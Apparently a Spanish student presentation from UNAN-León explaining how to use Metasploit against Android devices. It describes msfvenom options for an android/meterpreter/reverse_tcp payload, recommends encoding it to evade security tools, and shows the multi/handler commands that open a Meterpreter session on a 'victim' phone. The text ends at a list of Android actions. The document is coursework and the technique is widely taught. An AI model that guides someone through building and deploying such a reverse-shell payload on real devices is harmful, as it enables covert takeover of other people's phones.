Metasploit Android
Metasploit Android
Metasploit Android
UNAN-LEÓN
Integrante
Br. María Narváez Argeñal.
Br. Luis Ángel Vallecillo Dávila
Los pasos básicos a seguir para explotar vulnerabilidades usando Metasploit son:
Elegir y configurar el exploit (como hemos dicho, código que permite explotar la
vulnerabilidad de un sistema).
Confirmar si el objetivo es susceptible al exploit elegido (este paso es opcional).
Elegir y configurar el payload (código que se ejecuta una vez explotemos la
vulnerabilidad).
Elegir la técnica de encode o codificación para que el payload no sea detectados
por los elementos de seguridad del equipo (también es opcional aunque
recomendable).
Ejecutar el exploit.
NECESITAMOS:
(Opcional)
msfvenom: Indicará que utilizaremos Metasploit para el ataque.
-p: Indica a msfvenom que utilizaremos un payload.
android/meterpreter/reverse_tcp: Utilizaremos meterpreter por medio de una
conexión reversa, esto quiere decir que es el dispositivo vícima el que abrirá con
nosotros una sesión en Meterpreter.
lhost: Indica el host del "Virus", en este caso indicamos nuestra IP privada, la que
nos da el Router para identificarnos dentro del host.
lport: Es el puerto que utilizaremos para el ataque, intentar no utilizar puertos
normalmente usados como 80,4444, ya que puede estar siendo utilizado.
use exploit/multi/handler
exploit
Con esto tenemos una sesión de Meterpreter conectada hacia nuestra víctima, en este
caso se puede ver que el comando “sysinfo”
Con el comando HELP podemos ver qué acciones podemos hacer en el
dispositivo, muchas de las acciones ya fueron explicadas en POST anteriores,
pero las acciones particulares de Android son: